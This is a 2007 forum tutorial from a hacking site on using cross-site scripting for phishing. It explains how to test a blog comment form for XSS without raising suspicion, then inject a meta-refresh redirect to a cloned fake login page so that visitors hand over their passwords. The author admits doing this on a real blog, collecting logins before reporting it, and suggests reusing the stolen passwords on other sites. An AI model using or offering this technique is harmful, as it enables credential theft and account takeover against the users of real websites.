Follow us on Twitter!
Your life is ending one minute at a time. If you were to die tomorrow, what would you do today?
Sunday, April 20, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 29
Guests Online: 28
Members Online: 1

Registered Members: 82850
Newest Member: hardstylurr
Latest Articles

XSS Attacks and Phishing

Arrow Image A basic tut on XSS, how to test it, how to use this Vulnerability in a more interesting way.



Ok, alot of you know what XSS is but some of you dont. Its basically the injection of HTML/Javascript etc. into a form or input area. I recently used XSS in the interesting way i will present below on a blog site. Ok, so you arrive on site, you wanna be able to find out if its vulnerable to XSS without being to suspiciouse. Obviously if you type
Code
<script> javascript:alert (/owned/)</script>


in and it turns out not to work, your gonna be conspicuous and probably end up getting banned from the site.(which you may or may not care about) Anyhow, so you come to a form, this can be a Shoutbox, Chat area, Comment Form, Registration Page, Login, etc. In this example, i'll use the comment form to a blog, since thats what i did on the blog site i recently encountered.(Of course i was nice enough to report it , but only after getting a couple passes and havin some fun) So try injecting
Code
 <i>Hey</i>


first, then if it doesnt go through, they might just think you were tryin to italisize your words, just for kicks. If it goes through and in the comment area you see the words are italisized and no tags, than presto, XSS VULNERABLE!! Okay, so now you can go ahead and do the skiddish way of XSS injection and put in your javascript alert. Ooor you could set up a redirection to a Fake Login or Phishing page you set up etc. Ok, so first you go and make your fake login page on whatever host.
And of course, make it look EXACTLY like the login for the BlogSite<<for example>>.
Code
    <html>
<head>
<meta http-equiv="Refresh" content="0;URL=http://www.myphishinpage.com/login.php">
</head>
</html>





---So now every time somone views the injected blog, they'll be redirected to your fake login, then leading to them using it (thinking, oops, got logged out somehow) then giveing you there login info. And if you know other sites those people go on, you can probably use the login on those too. See a majority of people use the same password at least, on every site they go to, i confess, i do on most sites. Soo anyway you get my point, this is a much more effective (in my opinion) method to using XSS injections. YOU can be SKIDDISH and put a oh so terrifing javascript alert. Orrrr you can get some good ol' passes. Your choice, guess thats it, love ya HBH'ers . PEACE. B)

Comments

CrumHackeron February 17 2007 - 02:54:22
Sorry, not as good as i had hoped. ahh well. .. i was tired and lazy when i wrote this, not my best.
only_samuraion February 20 2007 - 06:16:05
meh.....it works. and you can always edit it
CrumHackeron February 20 2007 - 21:50:47
yeah, i did edit a little..its fine for now, i might add some more later
TotcoSon February 23 2007 - 04:43:46
i liked this a lot =]
Post Comment

Sorry.

You must have completed the challenge Basic 1 and have 100 points or more, to be able to post.